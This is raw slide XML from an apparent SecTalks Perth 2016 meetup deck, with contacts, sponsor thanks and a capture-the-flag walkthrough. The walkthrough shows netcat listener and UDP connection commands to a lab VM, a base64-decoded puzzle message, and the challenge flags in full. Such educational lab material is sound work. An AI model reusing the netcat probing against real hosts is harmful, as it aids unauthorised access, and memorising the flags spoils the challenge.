            <a:ext cx="3773347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~  ~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( o )o)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( o )o )o)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(o( ~~~~~~~~o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 )' ~~~~~~~'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 )|)       |-.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    _  |-.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|_||_) |  \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| ||_) |   | |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       |  / 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       |." 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       |- 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.========. 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Stay in touch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660966" y="1825625"/>
            <a:ext cx="9692833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IRC / SLACK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irc.sectalks.org &gt; #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="25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(there is some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="25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awesome slack goodness for the truly 1337 as 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well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="25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ask on the list for an invite)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="25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Mailinglist</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2500" b="1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http://groupspaces.com/sectalks/join</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="25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Github</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2500" b="1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https://github.com/sectalks/sectalks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AU" sz="2500" b="0" i="0" u="none" strike="noStrike" cap="none" baseline="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SecTalks</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="25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6818" y="2886145"/>
            <a:ext cx="865799" cy="8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122" y="4931244"/>
            <a:ext cx="979200" cy="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7531" y="3860290"/>
            <a:ext cx="944399" cy="9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6816" y="1748782"/>
            <a:ext cx="865750" cy="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Without further ado...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Burgers (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3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maccas</a:t>
            </a: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bar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Thanks to…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Kate (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3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Spacecubed</a:t>
            </a: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and Aaron + Sam (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="36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Hivint</a:t>
            </a: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for arranging free rooms</a:t>
            </a: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FESTIVE FUN SPONSORS – Asterisk, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="36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Hivint</a:t>
            </a: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&amp; Telstra </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"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Our volunteers tonight – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="36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nidogski</a:t>
            </a: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AU" sz="36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sagi</a:t>
            </a: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AU" sz="36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swarley</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="36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AU" sz="36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sudosammy</a:t>
            </a:r>
            <a:endParaRPr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700" cy="20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0999" cy="3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0" y="133034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AU" sz="12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Perth 2016									      	       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="12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  </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="12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2" name="Picture 1" descr="LS00329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9" y="3594597"/>
            <a:ext cx="584853" cy="101851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 algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hint: STFU!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1600" dirty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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> shows traffic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from port 4444…So…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nidogski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nidogski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -lv 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>V2VsY29tZSENCg0KWW91IGZpbmQgeW91cnNlbGYgc3RhcmluZyB0b3dhcmRzIHRoZSBob3Jpem9uLCB3aXRoIG5vdGhpbmcgYnV0IHNpbGVuY2Ugc3Vycm91bmRpbmcgeW91Lg0KWW91IGxvb2sgZWFzdCwgdGhlbiBzb3V0aCwgdGhlbiB3ZXN0LCBhbGwgeW91IGNhbiBzZWUgaXMgYSBncmVhdCB3YXN0ZWxhbmQgb2Ygbm90aGluZ25lc3MuDQoNClR1cm5pbmcgdG8geW91ciBub3J0aCB5b3Ugbm90aWNlIGEgc21hbGwgZmxpY2tlciBvZiBsaWdodCBpbiB0aGUgZGlzdGFuY2UuDQpZb3Ugd2FsayBub3J0aCB0b3dhcmRzIHRoZSBmbGlja2VyIG9mIGxpZ2h0LCBvbmx5IHRvIGJlIHN0b3BwZWQgYnkgc29tZSB0eXBlIG9mIGludmlzaWJsZSBiYXJyaWVyLiAgDQoNClRoZSBhaXIgYXJvdW5kIHlvdSBiZWdpbnMgdG8gZ2V0IHRoaWNrZXIsIGFuZCB5b3VyIGhlYXJ0IGJlZ2lucyB0byBiZWF0IGFnYWluc3QgeW91ciBjaGVzdC4gDQpZb3UgdHVybiB0byB5b3VyIGxlZnQuLiB0aGVuIHRvIHlvdXIgcmlnaHQhICBZb3UgYXJlIHRyYXBwZWQhDQoNCllvdSBmdW1ibGUgdGhyb3VnaCB5b3VyIHBvY2tldHMuLiBub3RoaW5nISAgDQpZb3UgbG9vayBkb3duIGFuZCBzZWUgeW91IGFyZSBzdGFuZGluZyBpbiBzYW5kLiAgDQpEcm9wcGluZyB0byB5b3VyIGtuZWVzIHlvdSBiZWdpbiB0byBkaWcgZnJhbnRpY2FsbHkuDQoNCkFzIHlvdSBkaWcgeW91IG5vdGljZSB0aGUgYmFycmllciBleHRlbmRzIHVuZGVyZ3JvdW5kISAgDQpGcmFudGljYWxseSB5b3Uga2VlcCBkaWdnaW5nIGFuZCBkaWdnaW5nIHVudGlsIHlvdXIgbmFpbHMgc3VkZGVubHkgY2F0Y2ggb24gYW4gb2JqZWN0Lg0KDQpZb3UgZGlnIGZ1cnRoZXIgYW5kIGRpc2NvdmVyIGEgc21hbGwgd29vZGVuIGJveC4gIA0KZmxhZzF7ZTYwNzhiOWIxYWFjOTE1ZDExYjlmZDU5NzkxMDMwYmZ9IGlzIGVuZ3JhdmVkIG9uIHRoZSBsaWQuDQoNCllvdSBvcGVuIHRoZSBib3gsIGFuZCBmaW5kIGEgcGFyY2htZW50IHdpdGggdGhlIGZvbGxvd2luZyB3cml0dGVuIG9uIGl0LiAiQ2hhbnQgdGhlIHN0cmluZyBvZiBmbGFnMSAtIHU2NjYi…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nidogski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nidogski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1200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endParaRPr lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" baseline="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7997572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BASE64 Decode the string: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Welcome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!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You find yourself staring towards the horizon, with nothing but silence surrounding you.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 look east, then south, then west, all you can see is a great wasteland of nothingness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&lt;snip&gt;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Frantically you keep digging and digging until your nails suddenly catch on an object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You dig further and discover a small wooden box. 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flag1{e6078b9b1aac915d11b9fd59791030bf} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is engraved on the lid.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open the box, and find a parchment with the following written on it. "Chant the string of flag1 - u666"</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" b="0" i="0" u="none" strike="noStrike" cap="none" baseline="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284277860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>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -4u IP_ADDRESS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>666</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nidogski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nidogski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -4u 192.168.56.101 666</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>opensesame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> md5 reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>loud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> crack of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>thunder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sounds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>knocked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to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your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feet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dazed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you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start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to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feel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fresh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> air </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>entering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your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lungs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> are free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>front</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you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written</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the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sand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>words</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flag2{c39cd4df8f2e35d20d92c2e44de5f7c6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> stand to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your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feet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you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notice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that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you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can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no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> longer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flicker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of light in the distance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You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turn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frantically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looking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>directions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until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suddenly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>murder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crows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appear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>horizon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>they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get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closer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you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can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see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one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>grasping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on to an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. As the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hits the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
